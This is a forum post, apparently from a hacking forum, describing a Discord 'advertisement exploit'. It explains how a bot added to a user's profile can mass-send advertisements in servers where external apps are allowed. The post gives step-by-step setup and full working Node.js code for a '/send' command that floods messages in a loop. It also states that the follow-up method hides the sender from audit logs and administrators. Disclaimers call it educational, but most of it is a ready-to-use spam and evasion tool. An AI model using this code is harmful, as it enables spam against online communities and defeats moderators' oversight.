(Platform: Discord - Advertisement Exploit) Advertisements Can Be Sent to Large Servers!

MPT-76' Alıntı:

Discord - Advertisement Exploit (HIGH)

Introduction

First of all, the purpose of this topic is for informational and educational purposes. Instead of misuse, you can take precautions on your servers.

How Does the System Work?

Due to a feature introduced with Discord.js 14.16.0, this advertisement exploit exists. With the update, you can now add Discord bots not only to servers but also to your profiles. When you add these bots to your profile, you can use their commands in servers and your DM box.

However, only message-sending commands are allowed. Additionally, the "Allow the use of external applications" feature in server and channel permissions must be enabled. If it is not enabled, messages will only be visible to the person using them.

Where Is the Issue?

"Allow the use of external applications" feature is enabled by default in every server.
By writing a code, advertisement spam can be performed, and since most people are unaware of this exploit, it is being sold as a paid service. People are making money off of this, and advertisements are being sent to large servers.

How Is It Done? - Important Points

I have written the code, and this is purely for educational purposes. We hide the user executing the command by making a follow-up to the bot's message. This way, even if we delete the message in the audit log, it will not be visible, preventing server administrators from detecting it.

Step 1: Create a bot via the Discord Developer Portal.
Step 2: Go to the Setup tab and check the "User Setup" option.
Step 3: Use the generated link to add the bot to your account.
Step 4: Install Node.js (a JavaScript runtime) and Visual Studio Code (a code editor) on your computer.
Step 5: Create a folder and open it with Visual Studio Code.
Step 6: Open the terminal and type `npm i discord.js` to install Discord.js.
Step 7: Create a file named `main.js` and insert the following code inside it.​

JavaScript:

//TURKHACKTEAM.ORG / MPT-76

const { Client, GatewayIntentBits, SlashCommandBuilder, REST, Routes } = require('discord.js');
const client = new Client({ intents: [GatewayIntentBits.Guilds, GatewayIntentBits.MessageContent, GatewayIntentBits.DirectMessages, GatewayIntentBits.DirectMessageTyping, GatewayIntentBits.DirectMessagePolls] });

const commandData = new SlashCommandBuilder()
  .setName('send')
  .setDescription('Advertisement exploit')
  .setIntegrationTypes(0, 1)
  .setContexts(0)
  .addStringOption(option =>
    option.setName('message')
      .setDescription('Message to be sent')
      .setRequired(true))
  .addStringOption(option =>
        option.setName('count')
          .setDescription('Number of messages to send')
          .setRequired(true));

            const token = "ENTER YOUR TOKEN"

client.once('ready', async () => {
  console.log(`Bot logged in as ${client.user.tag}`);

  const rest = new REST({ version: '10' }).setToken(token);
 
  try {
    console.log('Refreshing slash commands...');
    await rest.put(
      Routes.applicationCommands(client.user.id),
      { body: [commandData.toJSON()] }
    );
    console.log('Slash commands successfully refreshed.');
  } catch (error) {
    console.error('Error registering command:', error);
  }
});

client.on('interactionCreate', async interaction => {
  if (!interaction.isChatInputCommand()) return;
 
  if (interaction.commandName === 'send') {
    const messageContent = interaction.options.getString('message');
    try {
      const countt = interaction.options.getString('count');
 
      let count = 1;
      await interaction.reply({ content: `Messages are being sent...`, ephemeral: true });
 
      for (let i = 0; i < countt; i++) {
          count++;
          await interaction.followUp({ content: messageContent });
      }
 
    } catch (error) {
      console.error('Processing error:', error);
      await interaction.reply({ content: 'An error occurred!' });
    }

  }
});

process.on('unhandledRejection', error => {
  return console.log(error);
 
 });
 
 process.on('uncaughtException', error => {
   return console.log(error);
 
 })

client.login(token);

Step 8:Run your code by typing `node main.js`. Go to any server and type `/send`, your command will appear.

Executing the command:

If the feature is disabled in the server:

Audit Log and Tracking

First, we send the message privately and spam it using the follow-up method. Since the initial message disappears, the sender of the message cannot be traced and becomes unloggable.

DISCLAIMER:

The code has been written by me for educational purposes. It is strongly advised not to use it for malicious purposes.
The responsibility lies with the users. The situation has been reported to Discord.​

Genişletmek için tıkla ...